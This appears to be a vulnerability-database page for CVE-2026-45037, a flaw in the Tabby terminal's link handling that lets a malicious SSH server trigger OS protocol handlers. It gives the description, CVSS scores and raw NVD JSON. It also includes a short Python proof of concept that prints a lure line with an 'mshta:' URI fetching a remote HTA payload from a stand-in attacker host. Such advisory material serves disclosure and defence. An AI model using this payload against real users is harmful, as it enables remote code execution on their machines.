CVE-2026-45037

Description

Tabby (formerly Terminus) is a highly configurable terminal emulator. Prior to 1.0.232, Tabby's terminal linkifier passes any detected URI directly to the operating system's protocol handler without validating the protocol scheme. This allows a malicious SSH or Telnet server to send crafted terminal output containing dangerous protocol URIs which Tabby renders as clickable links, triggering arbitrary OS protocol handlers on the victim's machine. This vulnerability is fixed in 1.0.232.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Tabby < 1.0.232

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Simulation for CVE-2026-45037
# This script simulates a malicious SSH server sending a crafted payload.
# It demonstrates the payload generation, not the actual server implementation.

def generate_malicious_output():
    # The malicious URI designed to trigger the OS protocol handler
    # Example: Using mshta to execute a remote script (common technique)
    malicious_uri = "mshta:http://attacker.example.com/payload.hta"
    
    # Simulated terminal output that might appear in a real SSH session
    banner = "Welcome to the Secure Shell Server."
    trick_message = "Click here to verify your session: " + malicious_uri
    
    return banner + "\n" + trick_message

if __name__ == "__main__":
    print("[*] Generating malicious terminal output for CVE-2026-45037...")
    print(generate_malicious_output())

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45037
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45037
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45037/
[4] VulDB https://vuldb.com/cve/CVE-2026-45037
[5] https://github.com/Eugeny/tabby/security/advisories/GHSA-cmpc-v2x9-j9x9

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45037", "sourceIdentifier": "[email protected]", "published": "2026-05-15T17:16:48.623", "lastModified": "2026-05-15T17:16:48.623", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tabby (formerly Terminus) is a highly configurable terminal emulator. Prior to 1.0.232, Tabby's terminal linkifier passes any detected URI directly to the operating system's protocol handler without validating the protocol scheme. This allows a malicious SSH or Telnet server to send crafted terminal output containing dangerous protocol URIs which Tabby renders as clickable links, triggering arbitrary OS protocol handlers on the victim's machine. This vulnerability is fixed in 1.0.232."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-184"}, {"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://github.com/Eugeny/tabby/security/advisories/GHSA-cmpc-v2x9-j9x9", "source": "[email protected]"}]}}